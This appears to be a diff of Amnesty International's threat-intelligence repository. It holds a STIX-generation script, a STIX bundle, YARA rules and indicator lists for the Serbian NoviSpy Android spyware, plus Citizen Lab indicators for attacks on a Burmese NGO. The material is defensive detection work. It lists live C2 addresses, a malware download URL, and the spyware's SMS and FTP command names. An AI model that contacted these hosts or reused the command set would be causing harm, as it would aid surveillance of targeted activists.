malware = Malware(name="NoviSpy", is_family=False, description="IOCs for Serbian NoviSpy Android spyware")
res.append(malware)
for d in domains:
i = Indicator(indicator_types=["malicious-activity"], pattern="[domain-name:value='{}']".format(d), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for package_name in package_names:
i = Indicator(indicator_types=["malicious-activity"], pattern="[app:id='{}']".format(package_name), pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for cert_hash in package_cert_hashes:
hash_type = hash_format(cert_hash)
if not hash_type:
raise ValueError("Unknown hash type for {}".format(cert_hash))
i = Indicator(indicator_types=["malicious-activity"], pattern=f"[app:cert.{hash_type}='{cert_hash}']", pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
for sha256_hash in sha256_hashes:
if not hash_format(sha256_hash) == "sha256":
raise ValueError("File hash is not in SHA256 format: {}".format(sha256_hash))
i = Indicator(indicator_types=["malicious-activity"], pattern=f"[file:hashes.sha256='{sha256_hash}']", pattern_type="stix")
res.append(i)
res.append(Relationship(i, 'indicates', malware))
bundle = Bundle(objects=res)
with open(stix2_file_name, "w+") as f:
f.write(bundle.serialize(pretty=True, indent=4))
print("{} file created".format(stix2_file_name))

View File

@@ -0,0 +1,448 @@
{
"type": "bundle",
"id": "bundle--842bf1e2-05c8-4c9a-9a56-869349aaa6ba",
"objects": [
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831",
"created": "2024-12-13T21:15:49.152925Z",
"modified": "2024-12-13T21:15:49.152925Z",
"name": "NoviSpy",
"description": "IOCs for Serbian NoviSpy Android spyware",
"is_family": false
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f2784a32-7e47-4aab-a222-08d07d708db9",
"created": "2024-12-13T21:15:49.153129Z",
"modified": "2024-12-13T21:15:49.153129Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='176.223.111.131']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.153129Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--4969eaf8-2825-4533-9df5-b21d1f0bf8de",
"created": "2024-12-13T21:15:49.157137Z",
"modified": "2024-12-13T21:15:49.157137Z",
"relationship_type": "indicates",
"source_ref": "indicator--f2784a32-7e47-4aab-a222-08d07d708db9",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--250d0468-85be-4f64-b713-9f16f38e701b",
"created": "2024-12-13T21:15:49.158284Z",
"modified": "2024-12-13T21:15:49.158284Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='195.178.51.251']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.158284Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--fa40d886-20de-4838-8fd1-8c47f8265360",
"created": "2024-12-13T21:15:49.158783Z",
"modified": "2024-12-13T21:15:49.158783Z",
"relationship_type": "indicates",
"source_ref": "indicator--250d0468-85be-4f64-b713-9f16f38e701b",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c1727649-7998-4c5c-8c42-c87ff8911991",
"created": "2024-12-13T21:15:49.158896Z",
"modified": "2024-12-13T21:15:49.158896Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='94.140.125.174']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.158896Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--deda9142-7d08-438b-b220-c5dd09ec8376",
"created": "2024-12-13T21:15:49.159288Z",
"modified": "2024-12-13T21:15:49.159288Z",
"relationship_type": "indicates",
"source_ref": "indicator--c1727649-7998-4c5c-8c42-c87ff8911991",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9df7f73a-a2b5-4fb9-89b5-c4c398ae52be",
"created": "2024-12-13T21:15:49.159389Z",
"modified": "2024-12-13T21:15:49.159389Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='178.220.122.57']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.159389Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--1c009626-3d8b-4377-ac44-f2bcf48a3197",
"created": "2024-12-13T21:15:49.15967Z",
"modified": "2024-12-13T21:15:49.15967Z",
"relationship_type": "indicates",
"source_ref": "indicator--9df7f73a-a2b5-4fb9-89b5-c4c398ae52be",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3ce2e4ce-9693-4073-b64f-4dfe00db29ad",
"created": "2024-12-13T21:15:49.159762Z",
"modified": "2024-12-13T21:15:49.159762Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='185.86.148.174']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.159762Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--6a30d4d1-8752-4b53-8233-fbddf71ab0ae",
"created": "2024-12-13T21:15:49.160037Z",
"modified": "2024-12-13T21:15:49.160037Z",
"relationship_type": "indicates",
"source_ref": "indicator--3ce2e4ce-9693-4073-b64f-4dfe00db29ad",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--27792ca5-0167-446d-a885-78056ccb9555",
"created": "2024-12-13T21:15:49.160125Z",
"modified": "2024-12-13T21:15:49.160125Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='188.93.127.34']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.160125Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--e10509b1-4007-493e-b23f-5ca2e5a2c7e1",
"created": "2024-12-13T21:15:49.160459Z",
"modified": "2024-12-13T21:15:49.160459Z",
"relationship_type": "indicates",
"source_ref": "indicator--27792ca5-0167-446d-a885-78056ccb9555",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--875840ea-0bed-4549-8144-13cec119acb9",
"created": "2024-12-13T21:15:49.16055Z",
"modified": "2024-12-13T21:15:49.16055Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[domain-name:value='79.101.110.108']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.16055Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--ebbe0980-44ed-4e6f-81de-8a97538f35ab",
"created": "2024-12-13T21:15:49.160853Z",
"modified": "2024-12-13T21:15:49.160853Z",
"relationship_type": "indicates",
"source_ref": "indicator--875840ea-0bed-4549-8144-13cec119acb9",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ab6fe00c-d3bd-4f53-93bf-2d31e08cf40d",
"created": "2024-12-13T21:15:49.160941Z",
"modified": "2024-12-13T21:15:49.160941Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:id='com.gu.activity']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.160941Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--dbc74918-cdd0-4844-8111-b234ac3673f0",
"created": "2024-12-13T21:15:49.161701Z",
"modified": "2024-12-13T21:15:49.161701Z",
"relationship_type": "indicates",
"source_ref": "indicator--ab6fe00c-d3bd-4f53-93bf-2d31e08cf40d",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b7c463ad-22d9-4005-85d2-0a822592ef82",
"created": "2024-12-13T21:15:49.161792Z",
"modified": "2024-12-13T21:15:49.161792Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:id='com.serv.services']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.161792Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--252eb7b0-5033-48d9-b950-8811ae8b1766",
"created": "2024-12-13T21:15:49.162131Z",
"modified": "2024-12-13T21:15:49.162131Z",
"relationship_type": "indicates",
"source_ref": "indicator--b7c463ad-22d9-4005-85d2-0a822592ef82",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--909b894a-de5f-4525-8cef-ce3892b03226",
"created": "2024-12-13T21:15:49.162221Z",
"modified": "2024-12-13T21:15:49.162221Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:id='com.li.activity']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.162221Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--93936df0-ebcc-489f-b902-e47c183f6cc3",
"created": "2024-12-13T21:15:49.16251Z",
"modified": "2024-12-13T21:15:49.16251Z",
"relationship_type": "indicates",
"source_ref": "indicator--909b894a-de5f-4525-8cef-ce3892b03226",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b727dda3-c853-4e50-a76f-ede055c5d9d0",
"created": "2024-12-13T21:15:49.1626Z",
"modified": "2024-12-13T21:15:49.1626Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:id='com.accesibilityservice']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.1626Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--5797281f-343a-4131-b2c9-1951a121e8c6",
"created": "2024-12-13T21:15:49.162892Z",
"modified": "2024-12-13T21:15:49.162892Z",
"relationship_type": "indicates",
"source_ref": "indicator--b727dda3-c853-4e50-a76f-ede055c5d9d0",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--060f709b-6b13-4039-9f3b-35474b92a528",
"created": "2024-12-13T21:15:49.162979Z",
"modified": "2024-12-13T21:15:49.162979Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:cert.sha256='3ac97735164824657b683e805133b1274b2dedabf9fdd6aa9aca31089d501e64']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.162979Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--9ffa5599-cf6c-44a0-8482-949626ad5d60",
"created": "2024-12-13T21:15:49.164295Z",
"modified": "2024-12-13T21:15:49.164295Z",
"relationship_type": "indicates",
"source_ref": "indicator--060f709b-6b13-4039-9f3b-35474b92a528",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e0c172bb-e8eb-434e-8266-09feafdaa206",
"created": "2024-12-13T21:15:49.164396Z",
"modified": "2024-12-13T21:15:49.164396Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:cert.sha256='35926e966186c8f2deec66864389d73989c75c85cb6668da2f455db6fe67e91f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.164396Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--6d1b9b2a-051d-4b38-91ef-b60ee17d2acb",
"created": "2024-12-13T21:15:49.16473Z",
"modified": "2024-12-13T21:15:49.16473Z",
"relationship_type": "indicates",
"source_ref": "indicator--e0c172bb-e8eb-434e-8266-09feafdaa206",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c0b0fa21-3f5b-4201-b0cf-ec0a44a70335",
"created": "2024-12-13T21:15:49.164823Z",
"modified": "2024-12-13T21:15:49.164823Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[app:cert.sha256='38693e1ea0fbf39d28f66b1714fdeed4e23b3973276481097d2d66e87f3647eb']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.164823Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--c565aa18-93ff-4c29-861f-0e13e453f7c8",
"created": "2024-12-13T21:15:49.165381Z",
"modified": "2024-12-13T21:15:49.165381Z",
"relationship_type": "indicates",
"source_ref": "indicator--c0b0fa21-3f5b-4201-b0cf-ec0a44a70335",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a3f22e28-75cd-467f-8349-a8c0a0ea3654",
"created": "2024-12-13T21:15:49.165549Z",
"modified": "2024-12-13T21:15:49.165549Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[file:hashes.sha256='d55e492d5fce87898e065572a5553d1ac1389cd12bf3d28cabc1218cb29780af']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.165549Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--ba7b7587-af4c-4d9d-a5df-4f5b24385d72",
"created": "2024-12-13T21:15:49.166296Z",
"modified": "2024-12-13T21:15:49.166296Z",
"relationship_type": "indicates",
"source_ref": "indicator--a3f22e28-75cd-467f-8349-a8c0a0ea3654",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--99079f12-e131-4be9-b257-412671922265",
"created": "2024-12-13T21:15:49.1664Z",
"modified": "2024-12-13T21:15:49.1664Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[file:hashes.sha256='54ee2c4f3e2396b6f92def135d68abd35d63ca7f9c304633a36f705ba4728cb7']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.1664Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--4dfed635-fac9-4408-95ba-0b0f3a07820d",
"created": "2024-12-13T21:15:49.166781Z",
"modified": "2024-12-13T21:15:49.166781Z",
"relationship_type": "indicates",
"source_ref": "indicator--99079f12-e131-4be9-b257-412671922265",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9e6318cc-56ee-4be1-849a-f0339837d0a1",
"created": "2024-12-13T21:15:49.166874Z",
"modified": "2024-12-13T21:15:49.166874Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[file:hashes.sha256='99673ce7f10e938ed73ed4a99930fbd6499983caa7a2c1b9e3f0e0bb0a5df602']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.166874Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--cd1d9312-c9e5-42c9-931b-b673e1f3a7f1",
"created": "2024-12-13T21:15:49.167212Z",
"modified": "2024-12-13T21:15:49.167212Z",
"relationship_type": "indicates",
"source_ref": "indicator--9e6318cc-56ee-4be1-849a-f0339837d0a1",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4b278e85-9d79-45ca-babc-b33402c71e56",
"created": "2024-12-13T21:15:49.167352Z",
"modified": "2024-12-13T21:15:49.167352Z",
"indicator_types": [
"malicious-activity"
],
"pattern": "[file:hashes.sha256='087fc1217c897033425fe7f1f12b913cd48918c875e99c25bdb9e1ffcf80f57e']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-12-13T21:15:49.167352Z"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--1a3a8e01-7c95-4d72-87d7-5b47940259f3",
"created": "2024-12-13T21:15:49.167815Z",
"modified": "2024-12-13T21:15:49.167815Z",
"relationship_type": "indicates",
"source_ref": "indicator--4b278e85-9d79-45ca-babc-b33402c71e56",
"target_ref": "malware--fc5f2370-9d5b-4660-98d2-f7668b235831"
}
]
}

View File

@@ -0,0 +1,154 @@
rule APT_serbia_novispy_android_accesibilityservice {
meta:
description = "Rule for Serbian NoviSpy Android spyware APK, com.accesibilityservice version"
author = "Donncha O Cearbhaill, Amnesty International"
sample = "99673ce7f10e938ed73ed4a99930fbd6499983caa7a2c1b9e3f0e0bb0a5df602"
strings:
$dex = { 64 65 78 0A 30 33 ?? 00 }
// C2 communication
$c2_1 = "195.178.51.251"
$c2_2 = "79.101.110.108"
$c2_3 = "188.93.127.34"
// Unique Strings
$u_1 = "kataklinger vibercajzna" ascii nocase
$u_2 = "select action_command.* from action_command where action_id = ? and trigger_type = ?" ascii nocase
$u_3 = "6FDF20EAFA2D58AF609C72AE7092BB45" ascii nocase
$u_4 = "{\"cellChangeMonitoring\":true,\"signalStrengthMonitoring\":true,\"temperatureDelta\":1," ascii nocase
$u_5 = "{\"fileUpload\":false,\"audioRecording\":false,\"cellChangeMonitoring\":true,"ascii nocase
$u_6 = "\"serverIp\":\"188.93.127.34\"" ascii nocase
$u_7 = "ucitavanjepodataka" ascii nocase
// Other strings
$s_1 = "test.dat" ascii
$s_2 = "/active.config" ascii
$s_3 = "message_map.ser" ascii
$s_4 = "event type =" ascii
$s_5 = "change type subtree" ascii
$s_6 = "change type content description" ascii
$s_7 = "change type pane title" ascii
$s_8 = "content change type pane_appeared" ascii
$s_9 = "window state changed" ascii
$s_10 = "notification state changed" ascii
$s_11 = "window content changed" ascii
$s_12 = "view scrolled" ascii
$s_13 = "type selection changed" ascii
$s_14 = "type announcement" ascii
$s_15 = "scroll position =" ascii
$s_16 = "imei=%s;imsi=%s;phone=%s;sim_serial=%s;os=%s"
$s_17 = "imei=%s;imsi=%s;phone=%s;sim_serial=%s;roaming=%s;os=%s"
$s_18 = "last message = %s, level = %d, hash = %s, node count = %d"
$s_19 = "MyAccessibilityService"
condition:
$dex at 0 and (
any of ($u*) or
any of ($c2*) or
7 of ($s*)
)
}
rule APT_serbia_novispy_android_serv_services {
meta:
description = "Rule for Serbian NoviSpy Android spyware APK, com.serv.services version"
author = "Donncha O Cearbhaill, Amnesty International"
sample = "087fc1217c897033425fe7f1f12b913cd48918c875e99c25bdb9e1ffcf80f57e"
strings:
$dex = { 64 65 78 0A 30 33 ?? 00 }
// C2 communication
$c2_comm_1 = "178.220.122.57"
// Unique Strings
// C2 commands received via SMS
$sms_c2_cmd_1 = "C_ARF" ascii
$sms_c2_cmd_2 = "C_ARN" ascii
$sms_c2_cmd_3 = "C_AWF" ascii
$sms_c2_cmd_4 = "C_AWI" ascii
$sms_c2_cmd_5 = "C_AWN" ascii
$sms_c2_cmd_6 = "C_CRF" ascii
$sms_c2_cmd_7 = "C_CRN" ascii
$sms_c2_cmd_8 = "C_LCW" ascii
$sms_c2_cmd_9 = "C_MNS" ascii
$sms_c2_cmd_10 = "C_MXS" ascii
$sms_c2_cmd_11 = "C_R_F" ascii
$sms_c2_cmd_12 = "C_R_N" ascii
$sms_c2_cmd_13 = "C_SMF" ascii
$sms_c2_cmd_14 = "C_SMN" ascii
$sms_c2_cmd_15 = "C_SWF" ascii
$sms_c2_cmd_16 = "C_SWN" ascii
$sms_c2_cmd_17 = "C_UIR" ascii
$sms_c2_cmd_18 = "C_UMF" ascii
$sms_c2_cmd_19 = "C_UMN" ascii
$sms_c2_cmd_20 = "C_UWF" ascii
$sms_c2_cmd_21 = "C_UWN" ascii
$sms_c2_cmd_22 = "C_WLF" ascii
$sms_c2_cmd_23 = "C_WLN" ascii
// C2 commands received via FTP.
// This is not a comprehensive list of commands, generic command names are excluded to prevent false positives.
$ftp_c2_cmd_1 = "CALL_REC_OFF" ascii
$ftp_c2_cmd_2 = "CALL_REC_ON" ascii
$ftp_c2_cmd_3 = "CHARGING_REC_OFF" ascii
$ftp_c2_cmd_4 = "CHARGING_REC_ON" ascii
$ftp_c2_cmd_5 = "SECURE_REC_OFF" ascii
$ftp_c2_cmd_6 = "SECURE_REC_ON" ascii
$ftp_c2_cmd_7 = "SSD_MOBILE_OFF" ascii
$ftp_c2_cmd_8 = "SSD_MOBILE_ON" ascii
$ftp_c2_cmd_9 = "SSD_WIFI_OFF" ascii
$ftp_c2_cmd_10 = "SSD_WIFI_ON" ascii
$ftp_c2_cmd_11 = "UPLOAD_INTERVAL" ascii
$ftp_c2_cmd_12 = "UPLOAD_MOBILE_OFF" ascii
$ftp_c2_cmd_13 = "UPLOAD_MOBILE_ON" ascii
$ftp_c2_cmd_14 = "UPLOAD_WIFI_OFF" ascii
$ftp_c2_cmd_15 = "UPLOAD_WIFI_ON" ascii
$ftp_c2_cmd_16 = "AUTO_WIFI_INTERVAL" ascii
$ftp_c2_cmd_17 = "WIFI_LOCK_ON" ascii
$ftp_c2_cmd_18 = "WIFI_LOCK_OFF" ascii
$ftp_c2_cmd_19 = "AUTO_WIFI_ON" ascii
$ftp_c2_cmd_20 = "AUTO_WIFI_OFF" ascii
$ftp_c2_cmd_21 = "START_AUDIO" ascii
// App local settings configured based on C2 commands.
$setting_1 = "UIR" ascii
$setting_2 = "ULW" ascii
$setting_3 = "ULM" ascii
$setting_4 = "SSW" ascii
$setting_5 = "SSM" ascii
$setting_6 = "CRN" ascii
$setting_7 = "SRN" ascii
$setting_8 = "CRC" ascii
$setting_9 = "MXS" ascii
$setting_10 = "MNS" ascii
$setting_11 = "AWF" ascii
$setting_12 = "AWI" ascii
$setting_13 = "CHR" ascii
$setting_14 = "WLS" ascii
$setting_15 = "A_R_N" ascii
$setting_16 = "A_R_F" ascii
$setting_17 = "U_I" ascii
$setting_18 = "U_W_N" ascii
$setting_19 = "S_W_N" ascii
$setting_20 = "U_M_F" ascii
$setting_21 = "S_M_F" ascii
$setting_22 = "A_W_F" ascii
$setting_23 = "A_W_I" ascii
$setting_24 = "W_L_N" ascii
$setting_25 = "C_R_F" ascii
$setting_26 = "CH_R_F" ascii
$setting_27 = "S_R_N" ascii
condition:
$dex at 0 and (
any of ($c2_comm*) or
20 of ($sms_c2_cmd*) or
20 of ($ftp_c2_cmd*) or
20 of ($setting*)
)
}

View File

@@ -0,0 +1,3 @@
3ac97735164824657b683e805133b1274b2dedabf9fdd6aa9aca31089d501e64
35926e966186c8f2deec66864389d73989c75c85cb6668da2f455db6fe67e91f
38693e1ea0fbf39d28f66b1714fdeed4e23b3973276481097d2d66e87f3647eb

View File

@@ -0,0 +1,4 @@
com.serv.services
com.accesibilityservice
com.li.activity
com.gu.activity

View File

@@ -0,0 +1,4 @@
54ee2c4f3e2396b6f92def135d68abd35d63ca7f9c304633a36f705ba4728cb7
d55e492d5fce87898e065572a5553d1ac1389cd12bf3d28cabc1218cb29780af
99673ce7f10e938ed73ed4a99930fbd6499983caa7a2c1b9e3f0e0bb0a5df602
087fc1217c897033425fe7f1f12b913cd48918c875e99c25bdb9e1ffcf80f57e

View File

@@ -0,0 +1,5 @@
# Investigations
This repository contains indicators of compromise extracted from some of Amnesty International's technical investigations in targeted threats against human rights defenders.
These indicators are shared under the license [CC-BY](https://creativecommons.org/licenses/by/2.0/).

View File

@@ -0,0 +1,8 @@
## Attacks on NGO in Burma IOCs
This directory contains IOC from the Citizen Lab report [Targeted Malware Attacks against NGO Linked to Attacks on Burmese Government Websites](https://citizenlab.org/2015/10/targeted-attacks-ngo-burma/) published the 16th of October 2015.
Files included in this directory:
* openioc.ioc : IOCs in OpenIOC format
* stix.xml : IOCs in STIX XML format
* iocs.csv : IOCs in csv format

View File

@@ -0,0 +1,24 @@
uuid,event_id,category,type,value,comment,to_ids,date
581bacca-464c-4997-8812-49798e96ca05,4,Network activity,domain,"usacia.websecexp.com","c2 server from Palo Alto study",1,20151016
581bacca-5998-41ad-afb4-49798e96ca05,4,Network activity,domain,"webhttps.websecexp.com","c2 server from Palo Alto study",1,20151016
581bacca-ad18-4ff6-b8b5-49798e96ca05,4,Network activity,domain,"appeur.gnway.cc","c2 server from Palo Alto study",1,20151016
581bacca-eb70-4443-a7d1-49798e96ca05,4,Network activity,domain,"usafbi.websecexp.com","c2 server from Palo Alto study",1,20151016
581bace8-59d0-4c6e-859a-497a8e96ca05,4,Payload type,text,"9002","",0,20151016
581bacf2-d924-45bd-a930-49798e96ca05,4,Payload type,text,"3102","The variant is labeled 3102, because it always uses the string “3102” in its first communications with a C2 server",0,20151016
581bad0a-7524-46f8-9d57-497a8e96ca05,4,Network activity,ip-dst,"198.44.190.85","This IP is a Virtual Private Server (VPS) hosted in the US and owned by VpsQuan",1,20151016
581bad2c-3a60-4be9-8d21-49798e96ca05,4,Payload delivery,md5,"53f81415ccedf453d6e3ebcdc142b966","Attachments",0,20151016
581bad2c-d2d4-46f4-b0cb-49798e96ca05,4,Payload delivery,md5,"699b3d90b050cae37f65c855ec7f616a","Attachments",0,20151016
581bad2c-e744-4a48-ae12-49798e96ca05,4,Payload delivery,md5,"6701662097e274f3cd089ceec35471d2","Attachments",0,20151016
581bad50-2488-429a-b001-497a8e96ca05,4,Artifacts dropped,md5,"c4c147bdfddffec2eea6bf99661e69ee","ca-bundle.exe",1,20151016
581bad50-7890-4dcf-8436-497a8e96ca05,4,Artifacts dropped,md5,"cec071424d417a095221bf8992819388","XLBugHandler.dll",1,20151016
581bad50-8998-4012-926d-497a8e96ca05,4,Artifacts dropped,md5,"5710d567d98a8f4a6682859ce3a35336","lsass.exe",1,20151016
581bad50-a014-4095-a054-497a8e96ca05,4,Artifacts dropped,md5,"56f0e67d981024ddcc215543698f44fb","mcutil.dll",1,20151016
581bad50-aea8-4d5f-8e0c-497a8e96ca05,4,Artifacts dropped,md5,"884d46c01c762ad6ddd2759fd921bf71","mcf.exe",1,20151016
581bad50-d494-4e55-aa91-497a8e96ca05,4,Artifacts dropped,md5,"7e0081fba718fcd71753d3199a290f03","mcf.ep",1,20151016
581bad60-2a18-44cc-ac40-49798e96ca05,4,Artifacts dropped,md5,"49ceba3347d39870f15f2ab0391af234","xlbug.dat",1,20151016
581bad77-2c58-479e-833e-497a8e96ca05,4,Network activity,domain,"t1.mailsecurityservice.com","",1,20151016
581bad77-cde8-4c65-9449-497a8e96ca05,4,Network activity,domain,"t2.mailsecurityservice.com","",1,20151016
581bad90-56b0-4c8b-ba6b-497a8e96ca05,4,Internal reference,link,"https://citizenlab.org/2015/10/targeted-attacks-ngo-burma/","",0,20151016
5824e57b-8458-4669-b6a0-497a8e96ca05,4,Attribution,whois-registrant-email,"wojiaojilao2@sohu.com","",0,20151016
5824e58f-be40-407d-b91b-497a8e96ca05,4,Network activity,domain,"iyouthen.com","Identified through passive DNS",1,20151016
5824e5f1-d174-487e-9156-497a8e96ca05,4,Payload delivery,url,"http://www.hjclub.info/bbs/uploadfiles/45/ca-bundle.exe","",1,20151016
1 uuid event_id category type value comment to_ids date
2 581bacca-464c-4997-8812-49798e96ca05 4 Network activity domain usacia.websecexp.com c2 server from Palo Alto study 1 20151016
3 581bacca-5998-41ad-afb4-49798e96ca05 4 Network activity domain webhttps.websecexp.com c2 server from Palo Alto study 1 20151016
4 581bacca-ad18-4ff6-b8b5-49798e96ca05 4 Network activity domain appeur.gnway.cc c2 server from Palo Alto study 1 20151016
5 581bacca-eb70-4443-a7d1-49798e96ca05 4 Network activity domain usafbi.websecexp.com c2 server from Palo Alto study 1 20151016
6 581bace8-59d0-4c6e-859a-497a8e96ca05 4 Payload type text 9002 0 20151016
7 581bacf2-d924-45bd-a930-49798e96ca05 4 Payload type text 3102 The variant is labeled 3102, because it always uses the string “3102” in its first communications with a C2 server 0 20151016
8 581bad0a-7524-46f8-9d57-497a8e96ca05 4 Network activity ip-dst 198.44.190.85 This IP is a Virtual Private Server (VPS) hosted in the US and owned by VpsQuan 1 20151016
9 581bad2c-3a60-4be9-8d21-49798e96ca05 4 Payload delivery md5 53f81415ccedf453d6e3ebcdc142b966 Attachments 0 20151016
10 581bad2c-d2d4-46f4-b0cb-49798e96ca05 4 Payload delivery md5 699b3d90b050cae37f65c855ec7f616a Attachments 0 20151016
11 581bad2c-e744-4a48-ae12-49798e96ca05 4 Payload delivery md5 6701662097e274f3cd089ceec35471d2 Attachments 0 20151016
12 581bad50-2488-429a-b001-497a8e96ca05 4 Artifacts dropped md5 c4c147bdfddffec2eea6bf99661e69ee ca-bundle.exe 1 20151016
13 581bad50-7890-4dcf-8436-497a8e96ca05 4 Artifacts dropped md5 cec071424d417a095221bf8992819388 XLBugHandler.dll 1 20151016
14 581bad50-8998-4012-926d-497a8e96ca05 4 Artifacts dropped md5 5710d567d98a8f4a6682859ce3a35336 lsass.exe 1 20151016
15 581bad50-a014-4095-a054-497a8e96ca05 4 Artifacts dropped md5 56f0e67d981024ddcc215543698f44fb mcutil.dll 1 20151016
16 581bad50-aea8-4d5f-8e0c-497a8e96ca05 4 Artifacts dropped md5 884d46c01c762ad6ddd2759fd921bf71 mcf.exe 1 20151016
17 581bad50-d494-4e55-aa91-497a8e96ca05 4 Artifacts dropped md5 7e0081fba718fcd71753d3199a290f03 mcf.ep 1 20151016
18 581bad60-2a18-44cc-ac40-49798e96ca05 4 Artifacts dropped md5 49ceba3347d39870f15f2ab0391af234 xlbug.dat 1 20151016
19 581bad77-2c58-479e-833e-497a8e96ca05 4 Network activity domain t1.mailsecurityservice.com 1 20151016
20 581bad77-cde8-4c65-9449-497a8e96ca05 4 Network activity domain t2.mailsecurityservice.com 1 20151016
